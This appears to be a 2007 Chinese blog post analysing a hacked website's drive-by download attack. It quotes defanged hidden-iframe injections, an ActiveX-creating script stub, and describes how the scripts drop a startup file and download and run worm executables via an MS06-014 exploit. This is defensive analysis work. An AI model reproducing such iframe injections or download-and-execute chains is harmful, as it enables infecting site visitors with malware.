endurer 原創
2007-06-29 第1版
瀏覽該網站時,Kaspersky報告:惡意指令碼: 拒絕訪問。
檢查該網頁,發現代碼:
/---
<iframe src=hxxp://x*x*.k*o*5***1.com/index.htm width=50 height=0></iframe>
---/
hxxp://x*x*.k*o*5***1.com/index.htm 包含代碼:
/---
<iframe src="hxxp://x*x*.k*o*5***1.com/vip.htm" height=0 width=0></iframe>
<iframe src="hxxp://x*x*.k*o*5***1.com/vip1.htm" height=0 width=0></iframe>
<iframe src="hxxp://x*x*.k*o*5***1.com/vip2.htm" height=0 width=0></iframe>
---/
hxxp://x*x*.k*o*5***1.com/vip.htm 內容為:
/---
<SCRIPT src="vip.js"></SCRIPT>
<BODY onload=shit();><BR><BR>
---/
shit()定義在vip.js中:
/---
function shit()
{
try{qianxu_fan = new ActiveXObject("ThunderServer.webThunder.1");}
catch(e){return;}
---/
用來建立ActiveXObject"ThunderServer.webThunder.1"。
vip.js 利用它來的實施:
利用ADODB建立檔案:C:/Documents and Settings/All Users/「開始」菜單/程式/啟動/microsofts.hta
利用Shell.Run調用IE開啟網頁 hxxp://www.mv***ps*f.com/kl/vip.exevips.htm,下載病毒檔案vip.exe
利用shell.exec運行下載到IE臨時檔案夾中的病毒檔案vip[1].exe
檔案說明符 : D:/test/vip.exe
屬性 : A---
擷取檔案版本資訊大小失敗!
建立時間 : 2007-6-29 21:34:52
修改時間 : 2007-6-29 21:34:54
訪問時間 : 2007-6-29 0:0:0
大小 : 191972 位元組 187.484 KB
MD5 : 1ac930db8829397b86517eae9cc56c0e
瑞星報為:Worm.Win32.Agent.a
hxxp://x*x*.k*o*5***1.com/vip1.htm 內容為US-ASCII編碼。到 http://purpleendurer.ys168.com 下載US-ASCII編碼解碼程式進行解密,得到JavaScript代碼,功能是下載 kl.exe,儲存為 c:/Microsoft.com,利用 ShelL.Application 運行。
view-source:hxxp://x*x*.k*o*5***1.com/vip2.htm內容為US-ASCII編碼。解密得到JavaScript代碼,功能是利用MS06014漏洞下載 kl.exe,儲存為 c:/Microsoft.com,並建立 Microsoft.vbs,來運行。
kl.exe 已不存在。